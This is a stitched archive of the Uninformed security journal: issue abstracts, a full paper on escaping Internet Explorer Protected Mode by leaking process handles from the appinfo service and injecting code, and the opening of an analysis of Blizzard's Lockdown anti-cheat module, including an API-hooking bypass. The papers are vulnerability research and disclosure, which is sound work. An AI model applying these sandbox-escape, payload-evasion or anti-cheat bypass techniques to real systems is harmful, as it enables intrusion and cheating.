[5] Yan, Jeff Jianxin, Alan F. Blackwell, Ross J. Anderson, and Alasdair Grant. Password Memorability and Security: Empirical Results
http://doi.ieeecomputersociety.org/10.1109/MSP.2004.81
uninformed/7.txt
Exploitation Technology
Reducing the Effective Entropy of GS Cookies
skape
This paper describes a technique that can be used to reduce the effective entropy in a given GS cookie by roughly 15 bits. This reduction is made possible because GS uses a number of weak entropy sources that can, with varying degrees of accuracy, be calculated by an attacker. It is important to note, however, that the ability to calculate the values of these sources for an arbitrary cookie currently relies on an attacker having local access to the machine, such as through the local console or through terminal services. This effectively limits the use of this technique to stack-based local privilege escalation vulnerabilities. In addition to the general entropy reduction technique, this paper discusses the amount of effective entropy that exists in services that automatically start during system boot. It is hypothesized that these services may have more predictable states of entropy due to the relative consistency of the boot process. While the techniques described in this paper do not illustrate a complete break of GS, any inherent weakness can have disastrous consequences given that GS is a static, compile-time security solution. It is not possible to simply distribute a patch. Instead, applications must be recompiled to take advantage of any security improvements. In that vein, the paper proposes some solutions that could be applied to address the problems that are outlined.
pdf | code.tgz | html | txt
General Research
Memalyze: Dynamic Analysis of Memory Access Behavior in Software
skape
This paper describes strategies for dynamically analyzing an application's memory access behavior. These strategies make it possible to detect when a read or write is about to occur at a given location in memory while an application is executing. An application's memory access behavior can provide additional insight into its behavior. For example, it may be able to provide an idea of how data propagates throughout the address space. Three individual strategies which can be used to intercept memory accesses are described in this paper. Each strategy makes use of a unique method of intercepting memory accesses. These methods include the use of Dynamic Binary Instrumentation (DBI), x86 hardware paging features, and x86 segmentation features. A detailed description of the design and implementation of these strategies for 32-bit versions of Windows is given. Potential uses for these analysis techniques are described in detail.
pdf | code.tgz | html | txt
Mnemonic Password Formulas
I)ruid
The current information technology landscape is cluttered with a large number of information systems that each have their own individual authentication schemes. Even with single sign-on and multi-system authentication methods, systems within disparate management domains are likely to be utilized by users of various levels of involvement within the landscape as a whole. Due to this complexity and the abundance of authentication requirements, many users are required to manage numerous credentials across various systems. This has given rise to many different insecurities relating to the selection and management of passwords. This paper details a subset of issues facing users and managers of authentication systems involving passwords, discusses current approaches to mitigating those issues, and finally introduces a new method for password management and recall termed Mnemonic Password Formulas.
pdf | html | txt
uninformed/8.1.txt (file diff suppressed because it is too large)
uninformed/8.2.txt (file diff suppressed because it is too large)
uninformed/8.3.txt
Getting out of Jail: Escaping Internet Explorer Protected Mode
September, 2007
Skywing
Skywing@valhallalegends.com
http://www.nynaeve.net
Abstract: With the introduction of Windows Vista, Microsoft has added a new
form of mandatory access control to the core operating system. Internally
known as "integrity levels", this new addition to the security manager allows
security controls to be placed on a per-process basis. This is different from
the traditional model of per-user security controls used in all prior versions
of Windows NT. In this manner, integrity levels are essentially a bolt-on to
the existing Windows NT security architecture. While the idea is
theoretically sound, there does exist a great possibility for implementation
errors with respect to how integrity levels work in practice. Integrity
levels are the core of Internet Explorer Protected Mode, a new "low-rights"
mode where Internet Explorer runs without permission to modify most files or
registry keys. This places both Internet Explorer and integrity levels as a
whole at the forefront of the computer security battle with respect to Windows
Vista.
1) Introduction
Internet Explorer Protected Mode is a reduced-rights operational mode of
Internet Explorer where the security manager itself enforces a policy of not
allowing write access to most file system, registry, and other securable
objects by default. This mode does provide special sandbox file system and
registry space that is permitted to be written to by Internet Explorer when
operating in Protected Mode.
While there exist some fundamental shortcomings of Protected Mode as it is
currently implemented, such as an inability to protect user data from being
read by a compromised browser process, it has been thought to be effective at
blocking most write access to the system from a compromised browser. The
benefit of this is that if one is using Internet Explorer and a buffer overrun
occurs within IExplore.exe, the persistent impact should be lessened. For
example, instead of having write access to everything accessible to the user's
account, exploit code would instead be limited to being able to write to the
low integrity section of the registry and the low integrity temporary files
directories. This greatly impacts the ability of malware to persist itself or
compromise a computer beyond just IExplore.exe without some sort of user
interaction (such as persuading a user to launch a program from an untrusted
location with full rights, or other social engineering attacks).
2) Protected Mode and Integrity Levels
Internally, Protected Mode is implemented by running IExplore.exe as a low
integrity process. With the default security descriptor that is applied to
most securable objects, low integrity processes may not generally request
access rights that map to GENERIC_WRITE for a particular object. As Internet
Explorer does need to be able to persist some files and settings, exceptions
can (and are) carved out for low integrity processes in the form of registry
keys and directories with special security descriptors that grant the ability
for low integrity processes to request write access. Because the IExplore
process cannot write files to a location that would be automatically used
by a higher integrity process, and it cannot request dangerous access
rights to other running processes (such as the ability to inject code via
requesting PROCESS_VM_WRITE or the like), malware that runs in the context of
a compromised IExplore process is (theoretically) fairly contained from the
rest of the system.
However, this containment only holds as long as the system happens to be free
of implementation errors. Alas, but perhaps not unexpectedly, there are in
fact implementation problems in the way the system manages processes running
at differing integrity levels that can be leveraged to break out of the
Protected Mode (or low integrity) jail. To understand these implementation
errors, it is first necessary to gain a basic working understanding of how the
new integrity-based security model works in Windows. The integrity model is
key to a number of Windows Vista features, including UAC (User Account
Control).
When a user logs on to a computer in Windows Vista with UAC enabled, their
shell is normally started as a ``medium'' integrity process. (Integrity
levels are integers; symbolic designations such as ``low'', ``medium'',
``high'', or ``system'' are simply used to indicate certain well-known
intermediate values.) Medium integrity is the default integrity level even
administrators (except the default ``Administrator'' account, which is a
special case and is exempted from UAC). Most day to day activity is intended
to be performed at medium integrity; for instance, a word processor program
would be expected to operate at medium integrity, and (theoretically) games
would generally run at medium integrity as well. Games tend to be rather
poorly written in terms of awareness of the security system, however, so this
tends to not really be the case, at least not without added help from the
operating system. Medium integrity roughly corresponds to the environment
that a limited user would run as under previous versions of Windows. That is
to say, the user has read and write access to their own user profile and their
own registry hive, but not write access to the system as a whole.
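For reference, the well-known mandatory integrity levels correspond to fixed RID values defined in the Windows SDK (the SECURITY_MANDATORY_*_RID constants in winnt.h). The small model below maps an arbitrary token RID down to its symbolic level; the mapping function itself is an illustrative sketch, not Windows code:

```python
# Well-known mandatory integrity RIDs from winnt.h (SECURITY_MANDATORY_*_RID)
INTEGRITY_LEVELS = {
    0x0000: "untrusted",
    0x1000: "low",       # Protected Mode Internet Explorer
    0x2000: "medium",    # default user processes under UAC
    0x3000: "high",      # elevated administrators
    0x4000: "system",    # services
}

def integrity_label(rid):
    """Map a token's integrity RID to the highest well-known level not above it."""
    return INTEGRITY_LEVELS[max(level for level in INTEGRITY_LEVELS if level <= rid)]

print(integrity_label(0x1000))  # -> low
print(integrity_label(0x2100))  # between medium and high: still "medium"
```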
Now, when a user launches Internet Explorer, an IExplore.exe process is
launched as low integrity. The default security descriptor for most objects
on Windows prevents low integrity processes from gaining write access to
medium integrity securable objects, as previously mentioned. In reality, the
default security descriptor denies write access to higher integrities, not
just to medium integrity, though in this case the effect is similar in terms
of Internet Explorer. As a result, the IExplore.exe process cannot write
directly to most locations on the system.
However, Internet Explorer does, in certain cases, need to gain write access to
locations outside of the low integrity (Protected Mode) sandbox. For this
task, Internet Explorer relies on a helper process, known as ieuser.exe, which
runs at medium integrity level. There is a tightly controlled RPC interface
between ieuser.exe and IExplore.exe that allows Internet Explorer, running at
low integrity, to request that ieuser.exe display a dialog box asking the user
to, say, choose a save location for a file and then save said file to disk.
This is the mechanism by which one can save files in their home directory even
under Protected Mode. Because the RPC interface only allows IExplore.exe
to use the RPC interface to request that a file to be saved, a program cannot
directly abuse the RPC interface to write to arbitrary locations, at least not
without user interaction.
Part of the reason why the RPC interface cannot be trivially abused is that
there also exists some protection baked into the window manager that prevents
a thread at a lower integrity level from sending certain, potentially
dangerous, messages to threads at a higher integrity level. This allows
ieuser.exe to safely display user interface on the same desktop as the
IExplore.exe process without malicious code in the Internet Explorer process
simply being able to simulate fake keystrokes in order to cause it to save a
dangerous file to a dangerous location without user interaction.
Most programs that are integrity-level aware operate with the same sort of
paradigm that Internet Explorer does. In such programs, there is typically a
higher integrity broker process that provides a tightly controlled interface
to request that certain actions be taken, with the consent of the user. For
example, UAC has a broker process (a privileged service) that is responsible
for displaying the consent user interface when the user tries to perform an
administrative task. This operates similarly in principle to how Internet
Explorer can provide a security barrier through Protected Mode because the
lower privileged process (the user program) cannot magically elevate itself
to full administrative rights in the UAC case (which runs a program at high
integrity level, as opposed to the default medium integrity level).
Instead, it could only ask the service to display the consent UI, which is
protected from interference by the program requesting elevation due to the
window manager restrictions on sending dangerous messages to a higher
integrity level window.
3) Breaking the Broker
If one has been using Windows Vista for some time, none of the behavior that
has just been described should come across as new. However, there are some
cases that have not yet been discussed which one might have observed from time
to time with Windows Vista. For example, although programs are typically
restricted from being able to synthesize input across integrity levels, there
are some limited circumstances where this is permitted. One easy to see
instance of this is the on-screen keyboard program (osk.exe) which, despite
running without a UAC prompt, can generate keyboard input messages that are
transmitted to other processes, even elevated administrative processes. This
would at first appear to be a break in the security system; questions along
the lines of "If one program can magically send keystrokes to higher integrity
processes, why can't another?" come to mind. However, there are in fact some
carefully-designed restrictions that are intended to prevent a user (or a
program) from arbitrarily being able to execute custom code with this ability.
First of all, in order to request special access to send unrestricted keyboard
input, a program's main executable must resolve to a path within the Program
Files or Windows directory. Although the author feels that such a check is
essentially a giant hack at best, it does effectively prevent a "plain user"
running at medium integrity from being able to run custom code that can
synthesize keystrokes to high integrity processes, as a plain user would not
be able to write to any of these directories. Additionally, any such program
must also be signed with a valid digital signature from any trusted code
signing root. This is a fairly useless check from a security perspective, in
the author's opinion, as anybody can pay a code signing authority to get a
code signing certificate in their own name; code signing certificates are not
a guarantee of malware-free (or even bug-free) code. Although it would be
easy to bypass the second check with a payment to a certificate issuing
authority, a plain user cannot so easily bypass the first check relating to
the restriction on where the program main executable may be located.
Even if a user cannot launch custom code directly as a program with access to
simulate keystrokes to higher integrity processes (known as "uiaccess"
internally), one would tend to get the impression that it would be possible to
simply inject code into a running osk.exe instance (or other process with
uiaccess). This fails as well, however; the process that is responsible for
launching osk.exe (the same broker service that is responsible for launching
the UAC consent user interface, the "Application Information" (appinfo)
service) creates osk.exe with a higher than normal integrity level in order to
use the integrity level security mechanism to block users from being able to
inject code into a process with access to simulate keystrokes.
When the appinfo service receives a request to launch a program that may
require elevation, which occurs when ShellExecute is called to start a
program, it will inspect the user's token and the application's manifest to
determine what to do. The application manifest can specify that a program
runs with the user's integrity level, that it needs to be elevated (in which
case a consent user interface is launched), that it should be elevated if and
only if the current user is a non-elevated administrator (otherwise the
program is to be launched without elevation), or that the program requests the
ability to perform keystroke simulation to high integrity processes.
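The launch decision just described can be modeled as a short sketch. This
is purely illustrative pseudologic, not the actual appinfo code; the
manifest values correspond to the documented requestedExecutionLevel
settings (asInvoker, requireAdministrator, highestAvailable) and the
uiAccess manifest attribute.

```python
# Toy model of how the appinfo service decides what to do with a launch
# request, based on the application manifest and the caller's token.
# The real logic lives inside appinfo!RAiLaunchAdminProcess.

def decide_launch(requested_level, ui_access, is_non_elevated_admin):
    """Return a description of how the process will be launched."""
    if ui_access:
        # uiaccess programs get a raised integrity level, no consent UI.
        return "launch with raised integrity (uiaccess)"
    if requested_level == "asInvoker":
        return "launch at caller's integrity level"
    if requested_level == "requireAdministrator":
        return "show consent UI, launch elevated"
    if requested_level == "highestAvailable":
        # Elevate only if the user is a non-elevated administrator;
        # a true plain user gets the program without elevation.
        if is_non_elevated_admin:
            return "show consent UI, launch elevated"
        return "launch at caller's integrity level"
    raise ValueError("unknown requested execution level")
```

For example, `decide_launch("highestAvailable", False, True)` models the
common case of a filtered administrator being prompted for consent.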
In the case of a launch request for a program requesting uiaccess,
appinfo!RAiLaunchAdminProcess is called to service the request. The process
is then verified to be within the (hardcoded) set of allowed directories by
appinfo!AiCheckSecureApplicationDirectory. After validating that the program
is being launched from within an allowed directory, control is eventually
passed to appinfo!AiLaunchProcess which performs the remaining work necessary
to service the launch request. At this point, due to the "secure" application
directory requirement, it is not possible for a limited user (or a user
running with low integrity, for that matter) to place a custom executable in
any of the "secure" application directories.
Now, the appinfo service is capable of servicing requests from processes of
all integrity levels. Due to this fact, it needs to be capable of determining
the correct integrity level to create a new process from at this point.
Because the new process is not being launched as a full administrator in the
case of a process requesting uiaccess, no consent user interface is displayed
for elevation. However, the appinfo service does still need a way to protect
the new process from any other processes running as that user (as access to
synthesize keystrokes is considered sensitive). For this task, the
appinfo!LUASetUIAToken function is called by appinfo to protect the new
process from other plain user processes running as the calling user. This
is accomplished by adjusting the token that will be used to create the new
process to run at a higher integrity level than the caller, unless the
caller is already at high integrity level (0x3000). The way LUASetUIAToken
does this is to first try to query the linked token associated with the
caller's token. A linked token is a second, shadow token that is assigned
when a computer administrator logs in with UAC enabled; in the UAC case,
the user normally runs as a restricted version of themselves, without their
administrative privileges (or Administrators group membership), and at
medium integrity level.
If the calling user does indeed have a linked token, LUASetUIAToken retrieves
the integrity level of the linked token for use with the new process.
However, if the user doesn't have a linked token (i.e. they are logged on as a
true plain user and not an administrator running without administrative
privileges), then LUASetUIAToken uses the integrity level of the caller's
token instead of the token linked with the caller's token (in other words, the
elevation token). In the case of a computer administrator this approach would
normally provide sufficient protection, however, for a limited user, there
exists a small snag. Specifically, the integrity level that LUASetUIAToken
has retrieved matches the integrity level of the caller, so the caller would
still have free reign over the process.
To counteract this issue, there is an additional check baked into
LUASetUIAToken to determine if the integrity level that was selected is at (or
above) high integrity. If the integrity level is lower than high integrity,
LUASetUIAToken adds 16 to the integrity level (although integrity levels are
commonly thought of as just having four values, that is, low, medium, high,
and system, there are 0x1000 unnamed integrity levels in between each named
integrity level). So long as the numeric value of the integrity level chosen
is greater than the caller's integrity level, the new process will be
protected from the caller. In the case of the caller already being a full,
elevated administrator, there's nothing to protect against, so LUASetUIAToken
doesn't attempt to raise the integrity level above high integrity.
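The integrity level selection described above can be summarized in a
small sketch. The constants mirror the commonly cited values (low =
0x1000, medium = 0x2000, high = 0x3000); the function is a simplified
model of LUASetUIAToken's behavior, not its actual code.

```python
LOW, MEDIUM, HIGH = 0x1000, 0x2000, 0x3000

def select_uiaccess_integrity(caller_il, linked_token_il=None):
    """Simplified model of how LUASetUIAToken picks the integrity
    level for a new uiaccess process."""
    # Prefer the linked (elevation) token's integrity level if the
    # caller has one; otherwise fall back to the caller's own level.
    il = linked_token_il if linked_token_il is not None else caller_il
    # If the chosen level is below high integrity, bump it by 16 so
    # the new process outranks the caller (integrity levels between
    # the named values are legal).
    if il < HIGH:
        il += 16
    return il

# A non-elevated admin (linked token at high integrity) yields 0x3000;
# a true plain user at medium integrity yields 0x2010; a low integrity
# caller with no linked token yields 0x1010.
```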
After determining a final integrity level, LUASetUIAToken changes the
integrity level in the token that will be used to launch the new process to
match the desired integrity level. At this point, appinfo is ready to create
the process. If needed, the user profile block is loaded and an environment
block is created, following which advapi32!CreateProcessAsUser is called to
launch the uiaccess-enabled application for the caller with a raised integrity
level. After the process is created, the output parameters of
CreateProcessAsUser are marshalled back into the caller's process, and
AiLaunchProcess signals successful completion to the caller.
If one has been following along so far, the question of "How does all of
this relate to Internet Explorer Protected Mode?" has probably crossed
one's mind.
It turns out that there's a slight deficiency in the protocol outlined above
with respect to creating uiaccess processes. The problem lies in the fact
that AiLaunchProcess returns the output parameters of CreateProcessAsUser back
to the caller's process. This is dangerous, because in the Windows security
model, security checks are done when one attempts to open a handle; after a
handle is opened, the access rights requested are forever more associated with
that handle, regardless of who uses the handle. In the case of appinfo, this
turns out to be a real problem because appinfo, being the creator of the new
process, is handed back a thread and process handle that grant full access to
the new thread and process, respectively. Appinfo then marshals these handles
back to the caller (which may be running at low integrity level). At this
point, a privilege escalation problem has occurred; the caller has been
essentially handed the keys to a higher integrity process. While the caller
would never normally be able to open a handle to the new process on its own,
in this case, it doesn't have to, as the appinfo service does so on its behalf
and returns the handles back to it.
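The core of the problem (access rights being checked once at open time
and thereafter riding along with the handle) can be shown with a toy
model. This is an abstraction of Windows object manager semantics, not
real API calls; the names and integrity values are illustrative.

```python
class Handle:
    """Toy model: rights are checked when the handle is created, and
    are thereafter attached to the handle itself, not to its user."""
    def __init__(self, target_il, rights):
        self.target_il, self.rights = target_il, rights

def open_process(opener_il, target_il, rights):
    # The security check happens here, at open time only.
    if opener_il < target_il:
        raise PermissionError("access denied")
    return Handle(target_il, rights)

# The broker service (running well above the target) opens a
# full-access handle to the new uiaccess process...
broker_handle = open_process(opener_il=0x4000, target_il=0x2010,
                             rights="PROCESS_ALL_ACCESS")

# ...and marshals it back to a low integrity caller. No further check
# occurs: the recipient now wields access it could never obtain itself.
leaked = broker_handle
assert leaked.rights == "PROCESS_ALL_ACCESS"
```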
Now, in the ShellExecute case, the client stub for the appinfo
AiLaunchAdminProcess routine doesn't want (or need) the process or thread
handles, and closes them immediately after. However, this is obviously not a
security barrier, as this code is running in the untrusted process and could
be patched out. As such, there exists a privilege escalation hole of sorts
with the appinfo service. It can be abused to, without user interaction, leak
a handle to a higher integrity process to a low integrity process (such as
Internet Explorer when operating in Protected Mode). Furthermore, even
Internet Explorer in Protected Mode, running at low integrity, can request to
launch an already-existing uiaccess-flagged executable, such as osk.exe (which
is conveniently already in a "secure" application directory, the Windows
system directory). With a process and thread handle as returned by appinfo,
it is possible to inject code into the new process, and from there, as they
say, the rest is history.
3) Caveats
Although the problem outlined in this article is indeed a privilege escalation
hole, there are some limitations to it. First of all, if the caller is
running as a plain user instead of a non-elevated administrator, appinfo
creates the uiaccess process with integrity level 0x1010 (low integrity + 16).
This is still less than medium integrity (0x2000), and thus in the true
limited user case, the new process, while protected from other low integrity
processes, is still unable to interfere with medium integrity processes
directly.
In the case where a user is running as an administrator but is not elevated
(which happens to be the default case for most Windows Vista users), it is
true that the appinfo service returns a handle to a process running at high integrity
level. However, only the integrity level is changed; the process is most
certainly not an administrator (and in fact has BUILTIN\Administrators as a
deny only SID). This does mean that the new process is quite capable of
injecting code into any processes the user has started though (with zero user
interaction). If the user happens to already have a high integrity process
running on the desktop as a full administrator, the new process could be used
to attack it as the process would be running at the same integrity level and
it would additionally be running as the same user. This means that in the
default configuration, this issue can be used to escape from Protected Mode,
but one is still not given full-blown administrative access to the system.
However, any location in the user profile directory could be written to. This
effectively eliminates the security benefit of Protected Mode for a
non-elevated administrator (with respect to treating the user as a plain
user).
Source code to a simple program to demonstrate the appinfo service issue is
included with the article. The problem is at this point expected to be fixed
by Windows Vista Service Pack 1 and Windows Server 2008 RTM. The sample code
launches osk.exe with ShellExecute, patches out the CloseHandle calls in
ShellExecute to retain the process and thread handles, and then injects a
thread into osk.exe that launches cmd.exe. The sample program also includes a
facility to create a low integrity process to verify correct function; the
intended use is to launch a low integrity command shell, verify that
directories such as the user profile directory cannot be written to, and then
use the sample program from the low integrity process to launch a medium
integrity cmd.exe instance without user interaction, which does indeed have
free reign of the user profile directory. The same code will operate in the
context of Internet Explorer in Protected Mode, although in the interest of
keeping the example clear and concise, the author has not included code to
inject the sample program in some form into Internet Explorer (which would
simulate an attack on the browser).
Note that while the uiaccess process is launched as a high integrity process,
it is configured such that unless a token is explicitly provided that requests
high integrity, new child processes of the uiaccess process will launch as
medium integrity processes. It is possible to work around this issue and
retain high integrity with the use of CreateProcessAsUser by code injected
into the uiaccess process if desired. However, as described above, simply
retaining high integrity does not provide administrative access on its own.
If there are no other high integrity processes running as the current user on
the current desktop, running as high integrity and running as medium integrity
with the non-elevated token are functionally equivalent, for all intents and
purposes.
4) Conclusion
UAC, Internet Explorer Protected Mode, and the integrity level model represent
an entirely new way of thinking about security in the Windows world.
Traditionally, Windows security has been a user-based model, where all
processes that execute as a user were considered equally trusted. Windows
Vista and Windows Server 2008 are the first steps towards changing this model
to support the concept of an untrusted process (as opposed to an untrusted
user). While this has the potential to significantly benefit end user
security, as is the case with Internet Explorer Protected Mode, there are
bound to be bumps along the way. Writing an integrity level broker process is
difficult. It is very easy to make simple mistakes that compromise the
security of the integrity level mechanism, as the appinfo issue highlights.
The author would like to think that by shedding light on this type of
programming error, future issues of a similar vein may be prevented before
they reach end users.
uninformed/8.4.txt
uninformed/8.5.txt
uninformed/8.6.txt

uninformed/8.txt
Engineering in Reverse
An Objective Analysis of the Lockdown Protection System for Battle.net
Skywing
Near the end of 2006, Blizzard deployed the first major update to the version check and client software authentication system used to verify the authenticity of clients connecting to Battle.net using the binary game client protocol. This system had been in use since just after the release of the original Diablo game and the public launch of Battle.net. The new authentication module (Lockdown) introduced a variety of mechanisms designed to raise the bar with respect to spoofing a game client when logging on to Battle.net. In addition, the new authentication module also introduced run-time integrity checks of client binaries in memory. This is meant to provide simple detection of many client modifications (often labeled "hacks") that patch game code in-memory in order to modify game behavior. The Lockdown authentication module also introduced some anti-debugging techniques that are designed to make it more difficult to reverse engineer the module. In addition, several checks were introduced that are designed to make it difficult to simply load and run the Blizzard Lockdown module from the context of an unauthorized, non-Blizzard-game process. After all, if an attacker can simply load and run the Lockdown module in his or her own process, it becomes trivially easy to spoof the game client logon process, or to allow a modified game client to log on to Battle.net successfully. However, like any protection mechanism, the new Lockdown module is not without its flaws, some of which are discussed in detail in this paper.
html | pdf | txt
Exploitation Technology
ActiveX - Active Exploitation
warlord
This paper provides a general introduction to the topic of understanding security vulnerabilities that affect ActiveX controls. A brief description of how ActiveX controls are exposed to Internet Explorer is given along with an analysis of three example ActiveX vulnerabilities that have been previously disclosed.
html | pdf | txt
Context-keyed Payload Encoding
I)ruid
A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, thus making decoding on-the-fly trivial once the encoding algorithm is identified. It is feasible that an active observer may make use of the inherent functionality of the decoder stub to decode the payload of a suspected exploit in order to inspect the contents of that payload and make a control decision about the network traffic. This paper presents a new method of keying an encoder which is based entirely on contextual information that is predictable or known about the target by the attacker and constructible or recoverable by the decoder stub when executed at the target. An active observer of the attack traffic however should be unable to decode the payload due to lack of the contextual keying information.
html | pdf | txt
Improving Software Security Analysis using Exploitation Properties
skape
Reliable exploitation of software vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach. It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration.
html | pdf | txt
uninformed/9.1.txt
An Objective Analysis of the Lockdown Protection System for Battle.net
12/2007
Skywing
skywing@valhallalegends.com
Abstract
Near the end of 2006, Blizzard deployed the first major update to the version
check and client software authentication system used to verify the authenticity
of clients connecting to Battle.net using the binary game client protocol. This
system had been in use since just after the release of the original Diablo
game and the public launch of Battle.net. The new authentication module
(Lockdown) introduced a variety of mechanisms designed to raise the bar with
respect to spoofing a game client when logging on to Battle.net. In addition,
the new authentication module also introduced run-time integrity checks of
client binaries in memory. This is meant to provide simple detection of many
client modifications (often labeled "hacks") that patch game code in-memory in
order to modify game behavior. The Lockdown authentication module also
introduced some anti-debugging techniques that are designed to make it more
difficult to reverse engineer the module. In addition, several checks were introduced that
are designed to make it difficult to simply load and run the Blizzard
Lockdown module from the context of an unauthorized, non-Blizzard-game
process. After all, if an attacker can simply load and run the Lockdown
module in his or her own process, it becomes trivially easy to spoof the game
client logon process, or to allow a modified game client to log on to
Battle.net successfully. However, like any protection mechanism, the new
Lockdown module is not without its flaws, some of which are discussed in
detail in this paper.
1) Introduction
The Lockdown module is a part of several schemes that attempt to make it
difficult to connect to Battle.net with a client that is not a "genuine"
Blizzard game. For the purposes of this paper, the author considers both
modified/"hacked" Blizzard game clients, and third-party client software,
known as "emubots", as examples of Battle.net clients that are not genuine
Blizzard games. The Battle.net protocol also incorporates a number of schemes
(such as a proprietary mechanism for presenting a valid CD-Key for inspection
by Battle.net, and a non-standard derivative of the SRP password exchange
protocol for account logon) that by virtue of being obscure and undocumented
make it non-trivial for an outsider to successfully log a non-genuine client
on to Battle.net.
Prior to the launch of the Lockdown module, a different system filled the
role of validating client software versions. The previous system
was resistant to replay attacks (caveat: a relatively small pool of challenge
response values maintained by servers makes it possible to use replay attacks
after observing a large number of successful logon attempts) by virtue of the
use of a dynamically-supplied checksum formula that is sent to clients (a
challenge, in effect). This formula was then interpreted by the predecessor
to the Lockdown module, otherwise known as the "ver" or "ix86ver" module,
and used to create a one-way hash of several key game client binaries. The
resulting response would then be sent back to the game server for verification,
with an invalid response resulting in the client being denied access to
Battle.net.
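The shape of the old scheme can be sketched with a toy reconstruction.
The real "ver" formula language and hash are Blizzard-proprietary and
are not reproduced here; SHA-1 over a server-supplied challenge seed
stands in purely for illustration.

```python
import hashlib

def toy_checkrevision(challenge_seed, file_contents):
    """Toy stand-in for the old "ver" module: produce a one-way hash
    over key game binaries, keyed by a server-supplied challenge."""
    h = hashlib.sha1(challenge_seed)
    for data in file_contents:
        h.update(data)
    return h.hexdigest()

# Server side: precompute expected responses for a pool of seeds.
# Client side: run the same computation and send the result back.
files = [b"game.exe contents", b"storm.dll contents"]  # placeholders
expected = toy_checkrevision(b"seed-42", files)

# An unmodified client reproduces the expected response...
assert toy_checkrevision(b"seed-42", files) == expected
# ...while an on-disk modification to a checked binary does not.
assert toy_checkrevision(b"seed-42", [b"patched!", files[1]]) != expected
```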
While the "ver" module provides some inherent resistance to some
types of non-genuine clients (such as those that modify Blizzard game binaries
on disk), it does little to stop in-memory modifications to Blizzard game
clients. Additionally, there is very little to stop an attacker from creating
their own client software (an "emubot") that implements the "ver" module's
checksum scheme, either by calling "ver" directly or through the use of a
third-party, reverse-engineered implementation of the algorithm implemented in
the "ver" module. It should be noted that there exists one basic protection
against third party software calling the "ver" module directly; the "ver"
series of modules are designed to always run part of the version check hash on
the caller process image (as returned by the Win32 API GetModuleFileNameA).
This poses a minor annoyance for third party programs. In order to bypass
this protection, however, one need only hook GetModuleFileNameA and fake the
result returned to the "ver" module.
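The bypass amounts to interposing on the API that the check relies on.
Modeled here with simple function substitution; on Windows this would be
an IAT or inline hook of GetModuleFileNameA, and the paths and check are
hypothetical examples.

```python
# Toy model of the "ver" module's caller check and its classic bypass.

def get_module_file_name():
    # What the real API would report for a third-party caller.
    return r"C:\tools\emubot.exe"

def ver_caller_check(api):
    # "ver" folds the caller's image (located via the API) into its
    # hash; here we reduce that to a simple path check for clarity.
    return api().lower().endswith("starcraft.exe")

# Called directly, a foreign process fails the check...
assert not ver_caller_check(get_module_file_name)

# ...but hooking the API so it lies about the caller's image defeats it.
def hooked_get_module_file_name():
    return r"C:\Games\StarCraft\starcraft.exe"

assert ver_caller_check(hooked_get_module_file_name)
```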
Given the existing "ver" module's capabilities, the Lockdown module
represents a major step forward in the vein of assuring that only genuine
Blizzard client software can log on to Battle.net as a game client. The
Lockdown module is a first in many respects for Blizzard with respect to
releasing code that actively attempts to thwart analysis via a debugger
(and actively attempts to resist being called in a foreign process with
non-trivial mechanisms).
Despite the work put into the Lockdown module, however, it has proven perhaps
less effective than originally hoped (though the author cannot state the
definitive expectations for the Lockdown module, it can be assumed that a
"hacking life" of more than several days was an objective of the Lockdown
module). This paper discusses the various major protection systems embedded
into the Lockdown module and associated authentication system, potential
attacks against them, and technical counters to these attacks that Blizzard
could take in a future release of a new version check/authentication module.
Part of the problem the developers of the Lockdown module faced relates to
constraints on the environment in which the module operates. The author has
derived the following constraints currently in place for the module:
1. The server portion of the authentication system is likely static and does not
generate challenge/response values in real time. Instead, a pool of possible
values appear to be pregenerated and configured on the server.
2. The module needs to work on all operating systems supported by all Blizzard
games, which spans the gamut from Windows 9x to Windows Vista x64. Note that
there are provisions for different architectures, such as Mac OS, to use a
different system than Windows architectures.
3. The module needs to work on all versions of all Blizzard Battle.net games,
including previous versions. This is due to the fact that the module plays
an integral part in Battle.net's software version control system, and thus
is used on old clients before they can be upgraded.
4. Legitimate users should not see a high incidence of false positives, and it
is not desirable for false positives to result in automated permanent action
against legitimate users (such as account closure).
As an aside, in the author's opinion, the version check and authentication
system is not intended as a copy protection system for Battle.net, as it does
nothing to discourage additional copies of genuine Blizzard game software from
being used on Battle.net. In essence, the version check and authentication
system is a system that is designed to ensure that only copies of the
genuine Blizzard game software can log on to Battle.net. Copy protection
measures on Battle.net are provided through the CD-Key feature, wherein the
server requires that a user has a valid (and unique) CD-Key (for applicable
products).
2) Protection Schemes of the Lockdown Module
As a stark contrast to the old "ver" module, the Lockdown module includes a
number of active defense mechanisms designed to significantly strengthen the
module's resistance to attack (including either analysis or being tricked into
providing a "good" response to a challenge to an untrusted process).
The protection schemes in the Lockdown module can be broken up into several
categories:
1. Mechanisms to thwart analysis of the Lockdown module itself and the secret
algorithm it implements (anti-debugging/anti-reverse-engineering).
2. Mechanisms to thwart the successful use of Lockdown in a hostile process to
generate a "good" response to a challenge from Battle.net (anti-emubot, and
by extension anti-hack, where "anti-hack" denotes a counter to modifications
of an otherwise genuine Blizzard game client).
3. Mechanisms to thwart modifications to an otherwise-genuine Blizzard game
client that is attempting to log on to Battle.net (anti-hack).
In addition, the Lockdown module is also responsible for implementing a
reasonable facsimile of the original function of the "ver" module; that is, to
provide a way to authoritatively validate the version of a genuine Blizzard
game client, for means of software version control (e.g. the deployment of
the correct software updates/patches to old versions of genuine Blizzard game
clients connecting to Battle.net).
In this vein, the following protection schemes are present in the Lockdown
module and associated authentication system:
2.1) Clearing the Processor Debug Registers
The x86 family of processors includes a set of special registers that are
designed to assist in the debugging of programs. These registers allow a user
to cause the processor to stop when a particular memory location is accessed,
as an instruction fetch, as a data read, or as a data write. This debugging
facility allows a user (debugger) to set up to four different virtual addresses
that will trap execution when referenced in a particular way. The use of these
